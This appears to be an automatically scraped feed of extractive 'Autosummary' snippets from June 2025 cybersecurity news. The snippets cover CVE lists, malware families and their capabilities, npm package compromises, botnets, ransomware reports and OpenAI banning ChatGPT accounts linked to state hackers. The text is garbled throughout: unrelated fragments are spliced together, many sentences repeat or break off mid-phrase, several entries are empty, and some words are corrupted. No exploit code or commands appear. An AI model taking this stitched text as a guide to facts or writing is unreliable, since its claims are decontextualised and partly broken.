One of the malware"s known customers is FIN6 (aka Camouflage Tempest, Gold Franklin, ITG08, Skeleton Spider, and TA4557), an e-crime crew that originally targeted point-of-sale (PoS) systems in the hospitality and retail sectors to steal payment card details and profit off them. "Autosummary:
The findings also follow a report from Positive Technologies that multiple threat actors, including TA558, Blind Eagle, Aggah (aka Hagga), PhaseShifters (aka Angry Likho, Sticky Werewolf, and UAC-0050), UAC-0050, and PhantomControl, are using a crypter-as-a-service offering called Crypters And Tools to obfuscate files like Ande Loader.It"s equipped to steal passwords, cookies, and autofill information from both Chromium- and Gecko-based browsers, such as Google Chrome, Microsoft Edge, Brave, Opera, Vivaldi, and Mozilla Firefox. "Autosummary:
Below are the descriptions for these flaws: CVE-2025-32433 (CVSS score of 10) Erlang Erlang/OTP SSH Server Missing Authentication for Critical Function Vulnerability (CVSS score of 10) Erlang Erlang/OTP SSH Server Missing Authentication for Critical Function Vulnerability CVE-2024-42009 (CVSS score of 9.3) RoundCube Webmail Cross-Site Scripting Vulnerability The CVE-2025-32433 flaw is a critical issue that impacts older versions of Erlang/OTP, a toolkit used with the Erlang programming language. "Autosummary:
"During the triage process, Microsoft determined that the issue did not aect just a single module as initially believed, but actually 14 dierent modules," explains Binarly. "Autosummary:
Tag CVE ID CVE Title Severity .NET and Visual Studio CVE-2025-30399 .NET and Visual Studio Remote Code Execution Vulnerability Important App Control for Business (WDAC) CVE-2025-33069 Windows App Control for Business Security Feature Bypass Vulnerability Important Microsoft AutoUpdate (MAU) CVE-2025-47968 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability Important Microsoft Local Security Authority Server (lsasrv) CVE-2025-33056 Windows Local Security Authority (LSA) Denial of Service Vulnerability Important Microsoft Office CVE-2025-47164 Microsoft Office Remote Code Execution Vulnerability Critical Microsoft Office CVE-2025-47167 Microsoft Office Remote Code Execution Vulnerability Critical Microsoft Office CVE-2025-47162 Microsoft Office Remote Code Execution Vulnerability Critical Microsoft Office CVE-2025-47173 Microsoft Office Remote Code Execution Vulnerability Important Microsoft Office CVE-2025-47953 Microsoft Office Remote Code Execution Vulnerability Critical Microsoft Office Excel CVE-2025-47165 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office Excel CVE-2025-47174 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office Outlook CVE-2025-47171 Microsoft Outlook Remote Code Execution Vulnerability Important Microsoft Office Outlook CVE-2025-47176 Microsoft Outlook Remote Code Execution Vulnerability Important Microsoft Office PowerPoint CVE-2025-47175 Microsoft PowerPoint Remote Code Execution Vulnerability Important Microsoft Office SharePoint CVE-2025-47172 Microsoft SharePoint Server Remote Code Execution Vulnerability Critical Microsoft Office SharePoint CVE-2025-47166 Microsoft SharePoint Server Remote Code Execution Vulnerability Important Microsoft Office SharePoint CVE-2025-47163 Microsoft SharePoint Server Remote Code Execution Vulnerability Important Microsoft Office Word CVE-2025-47170 Microsoft Word Remote Code Execution Vulnerability Important Microsoft Office Word CVE-2025-47957 Microsoft Word Remote Code Execution Vulnerability Important Microsoft Office Word CVE-2025-47169 Microsoft Word Remote Code Execution Vulnerability Important Microsoft Office Word CVE-2025-47168 Microsoft Word Remote Code Execution Vulnerability Important Nuance Digital Engagement Platform CVE-2025-47977 Nuance Digital Engagement PlatformWindows Shortcut Files Security Feature Bypass Vulnerability Important Windows SMB CVE-2025-33073 Windows SMB Client Elevation of Privilege Vulnerability Important Windows SMB CVE-2025-32718 Windows SMB Client Elevation of Privilege Vulnerability Important Windows Standards-Based Storage Management Service CVE-2025-33068 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important Windows Storage Management Provider CVE-2025-32719 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Management Provider CVE-2025-24065 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Management Provider CVE-2025-24068 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Management Provider CVE-2025-33055 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Management Provider CVE-2025-24069 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Management Provider CVE-2025-33060 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Management Provider CVE-2025-33059 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Management Provider CVE-2025-33062 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Management Provider CVE-2025-33061 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Management Provider CVE-2025-33058 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Management Provider CVE-2025-32720 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Management Provider CVE-2025-33065 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Management Provider CVE-2025-33063 Windows Storage Management Provider Information Disclosure Vulnerability Important Windows Storage Port Driver CVE-2025-32722 Windows Storage Port Driver Information Disclosure Vulnerability Important Windows Win32K - GRFX CVE-2025-32712 Win32k Elevation of Privilege Vulnerability Important "Autosummary:
Flexcard does not enforce the "View Encrypted Data" permission, returning plaintext values for data that uses Classic Encryption (CVSS score: 7.5) - Flexcard does not enforce the "View Encrypted Data" permission, returning plaintext values for data that uses Classic Encryption CVE-2025-43701 (CVSS score: 7.5) -If "Check Field Level Security" is not enabled for "Extract" and "Turbo Extract Data Mappers, the "View Encrypted Data" permission check is not enforced, exposing cleartext values for the encrypted fields to users with access to a given record CVE-2025-43698 (CVSS score: N/A) - "Autosummary:
Compromised personal information in crash reports may include first and last names, mailing and/or physical addresses, driver’s license numbers, license plate numbers, vehicle make and model, car insurance policy numbers and other information such as injuries users may have sustained, and a narrative description of your crash. "Autosummary:
"Autosummary:
"Autosummary:
"In this Help Net Security interview, Renana Friedlich-Barsky, EVP and CISO at LPL Financial, discusses how threat actors are targeting high-net-worth clients and exploiting digital touchpoints in wealth management. She explains why firms must embed security from the start to protect sensitive assets and ensure seamless, secure client experiences. How are threat actors evolving their tactics to target high-net-worth clients or exploit digital touchpoints in wealth management platforms? Threat actors are becoming more targeted and … More
The post Balancing cybersecurity and client experience for high-net-worth clients appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Renana Friedlich-Barsky, EVP and CISO at LPL Financial, discusses how threat actors are targeting high-net-worth clients and exploiting digital touchpoints in wealth management.By demonstrating how strong security enhances brand reputation, customer confidence, and regulatory compliance, CISOs help shift the perception of cybersecurity from a cost center to a business enabler, driving security and sustainable digital transformation in wealth management. "The threat landscape in the bioeconomy is different from what most CISOs are used to. It includes traditional risks like data breaches, but the consequences are more complex. A compromise of genomic databases, for example, does not just expose personal health data. It can also leak proprietary genetic sequences that represent years of research and investment. These are not just privacy violations; they are breaches that can cripple a business’s future R&D pipeline. One example … More
The post CISOs, are you ready for cyber threats in biotech? appeared first on Help Net Security.
"Autosummary:
The threats are real, and the stakes are operational, reputational, and in some cases, biological. Strategies for CISOs To reduce risk in the bioeconomy, CISOs need to start thinking about cybersecurity and biosecurity as a single, combined effort, not separate problems. "Autosummary:
In addition, the China-linked clusters weaponized ChatGPT to work on a brute-force script that can break into FTP servers, research about using large-language models (LLMs) to automate penetration testing, and develop code to manage a fleet of Android devices to programmatically post or like content on social media platforms like Facebook, Instagram, TikTok, and X. Some of the other observed malicious activity clusters that harnessed ChatGPT in nefarious ways are listed below - A network, consistent with the North Korea IT worker scheme, that used OpenAI"s models to drive deceptive employment campaigns by developing materials that could likely advance their fraudulent attempts to apply for IT, software engineering, and other remote jobs around the world Sneer Review , a likely China-origin activity that used OpenAI"s models to bulk generate social media posts in English, Chinese, and Urdu on topics of geopolitical relevance to the country for sharing on Facebook, Reddit, TikTok, and X , a likely China-origin activity that used OpenAI"s models to bulk generate social media posts in English, Chinese, and Urdu on topics of geopolitical relevance to the country for sharing on Facebook, Reddit, TikTok, and X Operation High Five , a Philippines-origin activity that used OpenAI"s models to generate bulk volumes of short comments in English and Taglish on topics related to politics and current events in the Philippines for sharing on Facebook and TikTok , a Philippines-origin activity that used OpenAI"s models to generate bulk volumes of short comments in English and Taglish on topics related to politics and current events in the Philippines for sharing on Facebook and TikTok Operation VAGue Focus , a China-origin activity that used OpenAI"s models to generate social media posts for sharing on X by posing as journalists and geopolitical analysts, asking questions about computer network attack and exploitation tools, and translating emails and messages from Chinese to English as part of suspected social engineering attempts , a China-origin activity that used OpenAI"s models to generate social media posts for sharing on X by posing as journalists and geopolitical analysts, asking questions about computer network attack and exploitation tools, and translating emails and messages from Chinese to English as part of suspected social engineering attempts "Autosummary:
New Mirai botnet targets TBK DVRs by exploiting CVE-2024-3721 Pierluigi Paganini June 09, 2025 June 09, 2025 A new variant of the Mirai botnet exploits CVE-2024-3721 to target DVR systems, using a new infection method. "Autosummary:
"Autosummary:
This week"s list includes — CVE-2025-20286 (Cisco Identity Services Engine), CVE-2025-49113 (Roundcube), CVE-2025-5419 (Google Chrome), CVE-2025-21479, CVE-2025-21480, CVE-2025-27038 (Qualcomm), CVE-2025-37093 (HPE StoreOnce), CVE-2025-48866 (ModSecurity WAF), CVE-2025-25022 (IBM QRadar Suite), CVE-2025-22243 (VMware NSX Manager), CVE‑2025‑24364, CVE‑2025‑24365 (Vaultwarden), and CVE-2024-53298 (Dell PowerScale OneFS).Also known by the aliases, "dendimirror," "alinchok," "ghackihg," "makc1901," "navi_ghacking," and "bloodzz.fenix," Rudometov is believed to have fled from the Luhansk region of Ukraine where he was born to Krasnodar, Russia, following the Russian invasion of Ukraine in February 2022.Also known by the aliases, "dendimirror," "alinchok," "ghackihg," "makc1901," "navi_ghacking," and "bloodzz.fenix," Rudometov is believed to have fled from the Luhansk region of Ukraine where he was born to Krasnodar, Russia, following the Russian invasion of Ukraine in February 2022.The groups, overseen by Taiwan"s Information, Communications and Electronic Force Command (ICEFOM), include APT-C-01 (aka Poison Vine or GreenSpot), APT-C-62 (aka Viola Tricolor), APT-C-64 (aka Anonymous 64), APT-C-65 (aka Neon Pothos), and APT-C-67 (aka Ursa).The groups, overseen by Taiwan"s Information, Communications and Electronic Force Command (ICEFOM), include APT-C-01 (aka Poison Vine or GreenSpot), APT-C-62 (aka Viola Tricolor), APT-C-64 (aka Anonymous 64), APT-C-65 (aka Neon Pothos), and APT-C-67 (aka Ursa)."Their primary goal is to steal and sell sensitive intelligence, including important diplomatic policies, defense technology, cutting-edge scientific achievements, and economic data, to anti-China forces abroad," CVERC claimed in a report titled Operation Futile."Their primary goal is to steal and sell sensitive intelligence, including important diplomatic policies, defense technology, cutting-edge scientific achievements, and economic data, to anti-China forces abroad," CVERC claimed in a report titled Operation Futile.According to ReliaQuest, Lumma accounted for nearly 92% of Russian Market credential log alerts in Q4 2024, putting it way ahead of its peers RedLine, StealC, Raccoon, Vidar, RisePro, and a new stealer referred to as Acreed.According to ReliaQuest, Lumma accounted for nearly 92% of Russian Market credential log alerts in Q4 2024, putting it way ahead of its peers RedLine, StealC, Raccoon, Vidar, RisePro, and a new stealer referred to as Acreed."Over the past several months and years, we have observed a pattern of compliance failures, unmet improvement commitments, and the absence of tangible, measurable progress in response to publicly disclosed incident reports," Google said."Over the past several months and years, we have observed a pattern of compliance failures, unmet improvement commitments, and the absence of tangible, measurable progress in response to publicly disclosed incident reports," Google said. — China"s National Computer Virus Emergency Response Center (CVERC) has accused Taiwan"s Democratic Progressive Party (DPP) of sponsoring five advanced persistent threat (APT) groups to conduct cyber espionage attacks against government and public service entities, research institutions, universities, defense technology and industry entities, and foreign affairs agencies located in mainland china."During this period, customer endpoints remained protected, but security teams were unable to access the management console and related services, which significantly impacted their ability to manage their security operations and access important data," it said."During this period, customer endpoints remained protected, but security teams were unable to access the management console and related services, which significantly impacted their ability to manage their security operations and access important data," it said.Intel 471, in a report last week, highlighted an increase in Android malware incorporating hidden virtual network computing (HVNC), keylogging, and remote control functionalities, and a decrease in web injects.China Accuses Taiwan of Running 5 APT Groups with U.S. Help — China"s National Computer Virus Emergency Response Center (CVERC) has accused Taiwan"s Democratic Progressive Party (DPP) of sponsoring five advanced persistent threat (APT) groups to conduct cyber espionage attacks against government and public service entities, research institutions, universities, defense technology and industry entities, and foreign affairs agencies located in mainland china." — Threat hunters have disclosed a new malware campaign that employs cracked software or key generators for legitimate software as lures to distribute a known stealer malware called ViperSoftX, alongside other malware families such as Quasar RAT, PureCrypter, PureHVNC, and a cryptocurrency clipper. "Autosummary:
The posts, shared on TikTok, X, Reddit, and Facebook, included fake engagement to simulate popularity and targeted topics like Taiwan, USAID, and activist Mahrang Baloch.OpenAI bans ChatGPT accounts linked to Russian, Chinese cyber ops Pierluigi Paganini June 09, 2025 June 09, 2025 OpenAI banned ChatGPT accounts tied to Russian and Chinese hackers using the tool for malware, social media abuse, and U.S. satellite tech research. "Autosummary:
"Autosummary:
The Rhode Island-based company operates 53 distribution centers and delivers fresh and frozen products to over 30,000 locations across the United States and Canada, including supermarket chains, e-commerce providers, natural product superstores, independent retailers, and food service customers. "Autosummary:
The disclosure comes as China, India, Taiwan, Singapore, Japan, Malaysia, Hong Kong, Indonesia, South Korea, and Bangladesh have emerged as the most targeted countries in the APAC region in the first quarter of 2025, according to statistics shared by StormWall." Besides attempting to spread via FTP over port 21 and conducting telnet scanning, the botnet has been found to leverage a wide range of exploits targeting Huawei HG532 router (CVE-2017-17215), Realtek SDK (CVE-2014-8361), and TrueOnline ZyXEL P660HN-T v1 router (CVE-2017-18368). "Autosummary:
"Autosummary:
Time to brute-force phone numbers Source: BruteCat To start an attack against someone, their email address is required for the form, but Google has set this to hidden since last year. "Autosummary:
The new platform "brings together a fragmented ecosystem by bringing together plugins from any source" and "builds security into the supply chain, including improved cryptographic security measures, enhanced browser compatibility checking, and enabling reliance on trusted source security salts. "Autosummary:
How to report a scam in the United Kingdom Action Fraud: Report online at actionfraud.police.uk or call 0300 123 2040 (Monday to Friday, 8 am to 8 pm). How to report a scam in Canada Canadian Anti-Fraud Centre (CAFC): Call 1-888-495-8501 or report online. The methods in which to report a scam varies according to the country you’re in, the platforms you’re using, and the outcome of the scam, so here are the most common methods you may need. "Autosummary:
Gather evidence Keep all records related to the scam: emails, texts, receipts, screenshots, and any communication details. If you sent the money via payment apps (e.g. PayPal, Venmo, Cash App), contact the provider to inquire about recovery options. In the UK, for credit reports and monitoring contact Experian, Equifax, and TransUnion UK. "Autosummary:
Chapman faces charges of conspiracy to defraud the United States, wire fraud, bank fraud, aggravated identity theft, identity fraud, money laundering, operating an unlicensed money transmitting business, and unlawful employment of aliens. In May 2024, the Justice Department unsealed charges against an Arizona woman, a Ukrainian man, and three unidentified foreign nationals accused of aiding overseas IT workers, pretending to be U.S. citizens, to infiltrate hundreds of firms in remote IT positions.Following receipt of the laptops, and without authorization, Knoot logged on to the laptops, downloaded and installed unauthorized remote desktop applications, and accessed the victim companies’ networks, causing damage to the computers. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: June 2025 Patch Tuesday forecast: Second time is the charm? Microsoft has been busy releasing more out-of-band (OOB) patches than usual throughout May. Google fixes Chrome zero-day with in-the-wild exploit (CVE-2025-5419) Google has fixed two Chrome vulnerabilities, including a zero-day flaw (CVE-2025-5419) with an in-the-wild exploit. Rethinking governance in a decentralized identity world Decentralized identity (DID) is gaining traction, and … More
The post Week in review: Google fixes exploited Chrome zero-day, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: June 6, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Akamai, AttackIQ, Barracuda Networks, Bitdefender, Fortinet, Malwarebytes, and Varonis. Bankers Association’s attack on cybersecurity transparency A coalition of banking industry associations, including SIFA, the American Bankers Association (ABA), Bank Policy Institute (BPI), and several other lobbying groups have made a disgraceful appeal to the SEC to eliminate the rule requiring public disclosure of material cybersecurity incidents within four days of detection. Rethinking governance in a decentralized identity world Decentralized identity (DID) is gaining traction, and for CISOs, it’s becoming a part of long-term planning around data protection, privacy, and control. "Autosummary:
"Autosummary:
(54 Downloads) @react-native-aria/overlay version 0.3.16 (751 Downloads) @react-native-aria/radio version 0.2.14 (570 Downloads) @react-native-aria/slider version 0.2.13 (264 Downloads) @react-native-aria/switch version 0.2.5 (56 Downloads) @react-native-aria/tabs version 0.2.14 (170 Downloads) @react-native-aria/toggle version 0.2.12 (589 Downloads) @react-native-aria/utils version 0.2.13 (341 Downloads) Furthermore, the malicious code injected into the packages is similar to the remote access trojan that was delivered following the compromise of another npm package "rand-user-agent" last month, indicating that the same threat actors could be behind the activity. The list of the impacted packages and the affected versions is below - @gluestack-ui/utils version 0.1.16 (101 Downloads) @gluestack-ui/utils version 0.1.17 (176 Downloads) @react-native-aria/button version 0.2.11 (174 Downloads) @react-native-aria/checkbox version 0.2.11 (577 Downloads) @react-native-aria/combobox version 0.2.8 (167 Downloads) @react-native-aria/disclosure version 0.2.9 (N/A) "Autosummary:
"Autosummary:
"Autosummary:
22,000 @react-native-aria/overlays 0.3.16 96,000 @react-native-aria/radio 0.2.14 78,000 @react-native-aria/switch 0.2.5 477 @react-native-aria/toggle 0.2.12 81,000 @react-native-aria/utils "Ransomware breaches continue to rise even as fewer victims pay, according to a Delinea report. 69% of organizations globally have fallen victim to ransomware, with 27% being hit more than once. While only 57% of organizations paid ransoms, down from 76% in 2024, the frequency and impact of attacks continued to grow as threat actors turned to other tactics like extortion, with 85% of ransomware victims threatened with exposure. Paying the ransom doesn’t always bring … More
The post AI becomes key player in enterprise ransomware defense appeared first on Help Net Security.
"Autosummary:
At the same time, defenders are increasingly relying on AI to detect and respond to threats faster, with 90% of organizations now using AI in their ransomware defense strategies – primarily within Security Operations Centres (64%), for analysing Indicators of Compromise (62%), and to prevent phishing (51%). "In this Help Net Security interview, Benny Porat, CEO at Twine Security, discusses applying AI agents to security decisions. He explains why identity and access management (IAM) is the ideal starting point for both augmentation and automation, and shares advice on building trust in AI agents and integrating them into existing workflows.
The post Why IAM should be the starting point for AI-driven cybersecurity appeared first on Help Net Security.
"Autosummary:
High-volume, low-complexity tasks like identity hygiene, account ownership verification, and routine IAM workflows are good examples of where to start, and then move up to more complex scenarios requiring human judgment such as remediating audit findings, stale account identification and clean up, and user access reviews (UARs), where AI will help accelerate processes while still keeping humans still in the loop. Now let’s go back to AI agents – unlike human decision-making that relies on memory and subjective recollection, AI agents create complete, immutable audit trails capturing every decision point, data input, logical step, and action taken throughout the entire process. "Ransomware, trojans, and malware delivered through USB devices are putting growing pressure on industrial systems, according to the Honeywell 2025 Cyber Threat Report, which draws on data from monitoring tools deployed across industrial sites around the world. The findings highlight persistent and serious risks to OT environments that keep critical infrastructure running. Findings from the Honeywell Advanced Monitoring and Incident Response (AMIR) service The numbers aren’t great Researchers recorded a 46 percent increase in ransomware … More
The post Ransomware and USB attacks are hammering OT systems appeared first on Help Net Security.
"Autosummary:
Ransomware, trojans, and malware delivered through USB devices are putting growing pressure on industrial systems, according to the Honeywell 2025 Cyber Threat Report, which draws on data from monitoring tools deployed across industrial sites around the world.The rate at which the Industrials innovates has not kept in lock step and because of this, threat actors can easily repurpose known exploits and easily target industrial customers knowing that these facilities and equipment are 10 to 20 years old and patching schedules are typically sub par,” Paul Smith, director of Honeywell OT Cybersecurity Engineering, told Help Net Security.Worms like W32.Ramnit, a credential-stealing trojan originally tied to banking fraud, showed up in industrial networks with a 3,000 percent increase in detections. "Autosummary:
“The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) are releasing this joint advisory to disseminate the Play ransomware group’s IOCs and TTPs identified through FBI investigations as recently as January 2025.” reads the advisory. "Autosummary:
Some of the other activities carried out by the threat actor are listed below - Setting up persistence using scheduled tasks Assigning malicious component names similar to system or well-known executable files to evade detection Extracting the Active Directory database using ntdsutil Running various commands to collect information about Telegram, running processes, current users, remote RDP sessions, and antivirus software installed on the endpoints Using RDP and SSH protocols to perform lateral movement within Windows and Linux infrastructures Dropping legitimate remote access software like AnyDesk for command-and-control "The BO Team group poses a significant threat to Russian organizations due to its unconventional approach to conducting attacks," Kaspersky said. Specifically, it targets: Master Boot Record (MBR), $MFT, $MFTMirr, $LogFile, $Boot, $Bitmap, $TxfLog, $Tops, and $AttrDef. Pro-Ukrainian Hacktivist Group BO Team Targets Russia In recent months, Russian state-owned companies and organizations spanning technology, telecommunications, and production verticals are also said to have come under cyber assaults from a pro-Ukrainian hacktivist group codenamed BO Team (aka Black Owl, Hoody Hyena, and Lifting Zmiy). "Autosummary:
Australian Federal Police The Netherlands : National Police, Team Cybercrime Limburg, Public Prosecution Service : National Police, Team Cybercrime Limburg, Public Prosecution Service United States : Federal Bureau of Investigation; Naval Criminal Investigative Service; Internal Revenue Service Criminal Investigations; Department of Defense Criminal Investigative Service; Army Criminal Investigation Division : Federal Bureau of Investigation; Naval Criminal Investigative Service; Internal Revenue Service Criminal Investigations; Department of Defense Criminal Investigative Service; Army Criminal Investigation Division Belgium : Federal Prosecutor’s Office; Federal Police : Federal Prosecutor’s Office; Federal Police Portugal : Polícia Judiciária : Polícia Judiciária United Kingdom: National Crime Agency Cybersecurity firm ESET also supported international law enforcement operations. “Anyone with information on foreign government linked associates of Rudometov, or their malicious cyber activities, or foreign government-linked use of RedLine malware, should contact Rewards for Justice via the Tor-based tips-reporting channel at: he5dybnt7sr6cm32xt77pazmtm65flqy6irivtflruqfc5ep7eiodiad.onion (Tor browser required).” continues the announcement.U.S. Offers $10M bounty for info on RedLine malware creator and state hackers Pierluigi Paganini June 06, 2025 June 06, 2025 The U.S. offers up to $10M for info on state hackers linked to RedLine malware and its creator, Maxim Rudometov, tied to attacks on U.S. infrastructure. "Autosummary:
NatWest has advised customers on social media that it has "no timeframe" for a fix, but said its team is "working hard" to resolve it. "Autosummary:
"Autosummary:
This includes wipers named DoubleZero, CaddyWiper, HermeticWiper, IsaacWiper, WhisperKill, WhisperGate, and AcidRain. "Autosummary:
For instance, in February, Fortinet disclosed that the Chinese Volt Typhoon hacking group used two FortiOS SSL VPN flaws (CVE-2022-42475 and CVE-2023-27997) to deploy the Coathanger custom remote access trojan (RAT) malware, which had been previously used to backdoor a Dutch Ministry of Defence military network. "Autosummary:
Arcona Hotels & Resorts is a German-based company specializing in operating and developing hotels, particularly focusing on leisure and holiday hotels, boutique hotels, and 5-star properties. To be clear, these types of online scams are so effective because the hotel itself has been compromised, and travelers log into official, verified websites and services only to receive malicious messages from cybercriminals who are secretly in control. "Autosummary:
"Autosummary:
"Autosummary:
The cross-sector collaboration, Redmond added, made it possible to identify the broader network behind these operations, which includes pop-up creators, search-engine optimizers, lead generators, logistics and technology providers, payment processors, and talent providers. "Autosummary:
"Autosummary:
However, when the user clicks the "I am human" checkbox for evaluation, they are displayed an error message stating "CAPTCHA verification failed," urging them to click a button to go ahead with an "Alternative Verification. "Autosummary:
However, Mora_001 is tracked as an independent threat actor, it exhibits consistent post-exploitation tactics, including identical usernames across victims, overlapping IPs, and rapid ransomware deployment within 48 hours. "Autosummary:
"Autosummary:
"If it seems like scams are popping up everywhere lately, you’re not wrong. A new survey from Google shows most Americans feel the same, and they’re starting to change how they handle things online because of it. But different age groups are responding in different ways, and the tools people trust to stay safe vary more than you might expect. In a new blog post, Evan Kotsovinos, Google’s VP of Privacy, Safety and Security, breaks … More
The post Google survey shows Americans are changing how they fight scams appeared first on Help Net Security.
"Autosummary:
Kotsovinos said, “Most people, including Generation X, Baby Boomers and many Millennials, still rely on older sign in methods like passwords and 2FA, with about half of all Americans admitting to writing down or memorizing their passwords.” "Autosummary:
This method, called “SEO poisoning,” is deployed by scammers, hackers, and shady websites. "Autosummary:
Then last November, the cybersecurity firm said it observed the hacking crew orchestrating attacks against Iran"s neighbors, particularly regional and government entities in Iraq and diplomatic envoys from Iraq to various countries, using bespoke backdoors like Whisper (aka Veaty), Spearal, and Optimizer. "Autosummary:
Bitter"s Malware Families Some of the other known tools in its arsenal are below - ArtraDownloader , a downloader written in C++ that collects system information and uses HTTP requests to download and execute a remote file , a downloader written in C++ that collects system information and uses HTTP requests to download and execute a remote file Keylogger , a C++ module used in various campaigns to record keystrokes and clipboard content , a C++ module used in various campaigns to record keystrokes and clipboard content WSCSPL Backdoor , a backdoor that"s delivered via ArtraDownloader and supports commands to get machine information, execute remote instructions, and download and run files , a backdoor that"s delivered via ArtraDownloader and supports commands to get machine information, execute remote instructions, and download and run files MuuyDownloader (aka ZxxZ), a trojan that allows remote code execution of payloads received from a remote server (aka ZxxZ), a trojan that allows remote code execution of payloads received from a remote server Almond RAT , a .NET trojan that offers basic data gathering functionality and the ability to execute arbitrary commands and transfer files , a .NET trojan that offers basic data gathering functionality and the ability to execute arbitrary commands and transfer files ORPCBackdoor , a backdoor that uses the RPC protocol to communicate with a command-and-control (C2) server and runs operator-issued instructions , a backdoor that uses the RPC protocol to communicate with a command-and-control (C2) server and runs operator-issued instructions KiwiStealer , a stealer that searches for files matching a predefined set of extensions, are smaller than 50 MB, and have been modified within the past year, and exfiltrates them to a remote server , a stealer that searches for files matching a predefined set of extensions, are smaller than 50 MB, and have been modified within the past year, and exfiltrates them to a remote server KugelBlitz, a shellcode loader that"s used to deploy the Havoc C2 framework It"s worth noting that ORPCBackdoor has been attributed by the Knownsec 404 Team to a threat actor called Mysterious Elephant, which it said overlaps with other India-aligned threat clusters, including SideWinder, Patchwork, Confucius, and Bitter. "Autosummary:
“Given the active exploitation and evidence of the exploit being sold in underground forums, I believe it is in the best interest of defenders, blue teams, and the broader security community to publish a full technical breakdown but without complete PoC for now” - Kirill Firsov At the root of the security problem is the lack of sanitization of the $_GET["_from"] parameter, which leads to PHP Object deserialization. "Autosummary:
Devices connected to the BADBOX 2.0 operation included lower-price-point, "off brand", uncertified tablets, connected TV (CTV) boxes, digital projectors, and more," explains HUMAN. BADBOX 2.0 Global Distribution Source: HUMAN Satori In a joint operation led by HUMAN"s Satori team and Google, Trend Micro, The Shadowserver Foundation, and other partners, the BADBOX 2.0 botnet was disrupted again to prevent over 500,000 infected devices from communicating with the attacker"s servers. "Autosummary:
"Autosummary:
It can gather OS and user info, take screenshots, reboot or shut down the system, lock or sign out users (Windows only), browse and manage files (explore, upload, download, delete), and open URLs in the default browser. Chaos RAT enables attackers to manage files, open reverse shells, and proxy network traffic, which are functions useful for spying, stealing data, or setting the stage for ransomware. "Autosummary:
Process and File System Monitoring This component focuses on monitoring the system’s processes and file system activities: Process Monitoring: Tracks the creation, modification, and termination of processes. Architectural Overview of a Robust Security Service A robust security service typically comprises several components working together: Monitoring Engine: Continuously observes system activities such as process execution, file access, and network connections. Key Design Principles for Security Services When designing a security-focused Windows Service, several principles are essential to ensure effectiveness and reliability: Minimal Attack Surface: Design the service with the least privilege principle, granting it only the permissions necessary to perform its tasks. By integrating real-time monitoring, process and file system analysis, and network activity monitoring, the Windows Service can provide comprehensive protection against various threats. Network Activity Analysis Monitoring network activity is essential for identifying potential threats that rely on communication with external servers or other infected devices: Outbound Connections: Watches for unauthorized or unusual outbound connections, which could indicate data exfiltration or communication with a command-and-control server. "Autosummary:
"TXOne Networks announced an expanded new version of its SageOne OT Cybersecurity Governance Platform. Already relied upon by many industrial leaders across sectors with exacting cybersecurity requirements, TXOne SageOne has been enhanced to deliver a novel capability for intelligent vulnerability mitigation. One of the most common challenges faced by (operational technology) OT cybersecurity practitioners is how to patch effectively under time constraints—making risk-based prioritization essential. TXOne SageOne integrates external intelligence on emerging threats, the specific … More
The post TXOne Networks unveils intelligent vulnerability mitigation capability appeared first on Help Net Security.
"Autosummary:
The TXOne Networks solution implements a rigorous, three-phase approach to risk-based vulnerability management: Assess —TXOne SageOne pulls deep, OS-level vulnerability and configuration data—augmented by real-time threat intelligence—to build an accurate, context-rich view of every CPS asset’s true risk exposure. "Autosummary:
"Autosummary:
⚠️ This marks the third cybersecurity incident… pic.twitter.com/k00j8AzmRj — VenariX (@_venarix_) June 3, 2025 Recently, other luxury and fashion brands were victims of cyber attacks, including Adidas, Dior, and Victoria’s Secret. "Google has fixed two Chrome vulnerabilities, including a zero-day flaw (CVE-2025-5419) with an in-the-wild exploit. About CVE-2025-5419 CVE-2025-5419 is a high-severity out of bounds read and write vulnerability in V8, the JavaScript and WebAssembly engine developed by Google for the Chromium and Chrome web browsers. It allows remote attackers to trigger heap corruption via a crafted HTML page. It was reported by Clément Lecigne and Benoît Sevens of Google’s Threat Analysis Group – a specialized … More
The post Google fixes Chrome zero-day with in-the-wild exploit (CVE-2025-5419) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Roundcube Webmail under fire: critical exploit found after a decade Pierluigi Paganini June 04, 2025 June 04, 2025 A critical flaw in Roundcube webmail, undetected for 10 years, allows attackers to take over systems and execute arbitrary code. "Autosummary:
CVE-2025-21479 Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability CVE-2025-21480 Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability CVE-2025-27038 Qualcomm Multiple Chipsets Use-After-Free Vulnerability This week, Qualcomm addressed the above zero-day vulnerabilities that, according to the company, have been exploited in limited, targeted attacks in the wild. "Autosummary:
"Autosummary:
During the NFT claiming or minting process, it is crucial never to share passwords, seed phrases, or one-time passwords (OTPs), unless you initiated contact. "Autosummary:
"Autosummary:
This Chrome update also patches a medium-severity, use-after-free flaw (CVE-2025-5068) in the open-source rendering engine Blink and one internally discovered vulnerability. "Autosummary:
"The success of campaigns like UNC6040"s, leveraging these refined vishing tactics, demonstrates that this approach remains an effective threat vector for financially motivated groups seeking to breach organizational defenses," Google said. "Autosummary:
Once installed, the malware connects to an external server and awaits commands that allow it to launch reverse shells, upload/download/delete files, enumerate files and directories, take screenshots, gather system information, lock/restart/shutdown the machine, and open arbitrary URLs. "Autosummary:
"Autosummary:
